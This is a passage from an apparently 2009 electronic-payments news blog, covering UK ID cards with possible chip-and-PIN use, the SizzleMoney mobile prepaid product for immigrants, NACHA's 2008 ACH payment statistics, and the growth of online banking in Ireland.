A spokesman for the UK Border Agency (UKBA) said 42,000 foreign nationals had been through the enrollment process and had their biometric details taken. Mr Hall said he was looking at how ID card holders could "assert their identities" online when the card is rolled out.

He said: "One of the reasons for the format of the card is we have the opportunity to put it in to card readers and potentially use it in existing networks such as the ATM network.

One of the issues on the table is whether we should introduce chip and pin technology in to the card. There are no technical reasons why we couldn't do that." Editor's Note: In fact, HomeATM's SAFETPIN is EMV ready (smart card, chip ready) Which brings up a question. How would a software PIN Debit application work in an EMV environment? If you know, comment below...lol!

Related articles
BSMS - Both Sides of the Mouth Syndrome (pindebit.blogspot.com)

SizzleMoney Offers Mobile Banking to Immigrants

I blogged about SizzleMoney about a week ago, but here's an excerpt from a good article in this morning's American Banker...

Prepaid Account Offers Mobile Banking Service to Immigrants

By Will Hernandez
American Banker | Tuesday, April 7, 2009

Denarii Payments Inc. of Atlanta has developed a mobile phone-linked prepaid product called SizzleMoney that is initially targeting Hispanic immigrants.

People can use the product to send one another money by text message, access funds in their SizzleMoney accounts with a prepaid debit card and make purchases at the point of sale with their phones.

"It's basically mobile cash," said Donald Baggett, Denarii's founder and chief executive officer.

Denarii said SizzleMoney will appeal to immigrants, who often use their mobile phones as their primary method of communication.

The SizzleMoney account features debit cards bearing the logos of the Maestro, Pulse, Star and Cirrus debit networks. The cards can be used to make PIN debit purchases and to make withdrawals at automated teller machines. Customers can upgrade to MasterCard Inc.-branded debit cards.

Central National Bank of Enid, Okla., issues the cards and its Interactive Transaction Services subsidiary processes the transactions.

Continue Reading at American Banker

Will Hernandez is the associate editor of ATM&Debit News.

NACHA - 18.2 Billion ACH Payments in 2008

ACH Transaction Volume up by 1.2 Billion Payments - Despite Economic and Industry Pressures

Consumer ACH Bill Payments Made via Internet near $1 Trillion

Orlando Florida: PIN Payments News: The number of ACH payments in 2008 topped 18.2 billion, representing an increase of 1.2 billion over 2007, according to statistics released today by NACHA - The Electronic Payments Association at its PAYMENTS 2009 conference.

"Consumers, businesses, and government are continuing to embrace the safe, smart, and green attributes of ACH payments and choosing electronic over paper," said Janet O. Estep, NACHA president and chief executive officer. "Despite the overall economy slowing in 2008, the ACH Network continues to see positive growth."

The portion of ACH payment volume passing through the ACH Operators grew in 2008 to nearly 15 billion transactions. The number of ACH Network transactions in 2008 was 14,960,689,587, which is 7.1 percent more than 2007. The dollar value of these payments was $29.96 trillion, an increase of 4 percent over 2007.

Internet Payments

Internet-initiated ACH debits (WEB) experienced robust growth in 2008, increasing by 19.7 percent to almost 2.1 billion payments. When combined with consumer-initiated credit payments (CIE), the dollar value of consumer ACH payments made via the Internet is nearing $1 trillion annually ($939 billion in 2008).

Business-to-Business (B2B) Payments/Financial EDI

More than 1 billion EDI-formatted addenda records were transmitted across the ACH Network in 2008, a 14.6 percent increase over 2007. Businesses use EDI-formatted addenda records to send and receive invoice- and other payment-related information. The volume of CTX payments, which can carry up to 9,999 addenda records, increased by 16.1 percent, and the number of CCD payments carrying an addenda record increased by 17.9 percent.

Back Office Conversion (BOC)

In its first full year of availability, the newest e-check transaction - BOC - grew by 1,772 percent in 2008 to a total of 78,460,461 payments. This volume is comparable to the original Point-of-Purchase (POP) check conversion application when accounting for the significant decline in consumer check-writing over the past eight years. At the same time period after its introduction, the annualized volume of POP transactions was 101 million; however, consumer check-writing has been declining during this time period by about 4 percent per year.

Federal Government Payments

The Federal government used the ACH Network for more than 30 million Direct Deposits as part of 2008's economic stimulus package. This contributed to an overall growth of Federal government ACH payments of 10.2 percent, to 1,145,895,074 payments in 2008. According to the Financial Management Service, the Federal government saves $0.925 for every Direct Deposit that replaces a check payment. With over 1 billion Direct Deposits, the Federal government saved at least $925 million in 2008 by using the ACH Network.

Network Risk and Quality Indicators

The most significant ACH Network risk and quality indicators improved moderately in 2008. Overall, the rate at which ACH debits are returned as unauthorized declined slightly from 0.041 percent to 0.040 percent, and there were no SEC codes that had a significant increase in its unauthorized rate.

NACHA -- The Electronic Payments Association

NACHA -- The Electronic Payments Association is a not-for-profit association that oversees the Automated Clearing House (ACH) Network, a safe, efficient, green, and high-quality payment system. More than 15,000 depository financial institutions originated and received 18.2 billion ACH payments in 2008. NACHA is responsible for the administration, development, and enforcement of the NACHA Operating Rules and sound risk management practices for the ACH Network. Through its industry councils and forums, NACHA brings together hundreds of payments system stakeholder organizations to encourage the efficient utilization of the ACH Network and develop new ways to use the Network to benefit its diverse set of participants. NACHA represents nearly 11,000 financial institutions through direct membership and 19 regional payments associations. NACHA and its members provide education, tools, and resources to increase the adoption of ACH payments to benefit businesses, consumers, and governments. To learn more, visit www.nacha.org and www.electronicpayments.org.

SOURCE: NACHA

NACHA, PIN Payments News Blog

Online Banking in Ireland Soars

Source: Finextra
Complete item: http://www.finextra.com/fullstory.asp?id=19891

Description:

The popularity of online banking in Ireland has soared over the last year, with 2.2 million customers now registered, a 28% increase on the previous year. According to data gathered from financial institutions by the Irish Banking Federation (IBF) and Irish Payment Services Organisation (Ipso), 2.2 million customers were registered for online banking by the end of 2008, up 27.8% on the 1.8 million recorded at the end of 2007. Ireland has a population of around 4.4 million.

In addition, there was a 31.6% rise in the number of Internet payments to 30.7 million - equivalent to 84,000 per day. A 33.6% increase, to 123 million, was also recorded in the number of times customers accessed their account balances online.

Pat Farrell, CEO, IBF, says: "We can see from the data compiled to date that online banking is on a significant growth path in Ireland. Comparative figures for 2007 show that the average user here made 14% more online payments and 20% more online enquiries than his/her UK counterpart. However, in a leading online adopter like Norway the average customer made around three times more payments online - indicating that there is considerable scope for further growth."

Una Dillon, head, card services and communications, Ipso, adds: "Online banking is facilitating the migration from cheques and other paper-based payment methods to electronic payments. The move to electronic payments is vital in ensuring Ireland's competitiveness and efficiency within the wider European market."

Thursday, April 9, 2009

Wednesday, April 8, 2009

Tuesday, April 7, 2009

Related articles by Zemanta

Related articles

Disqus for ePayment News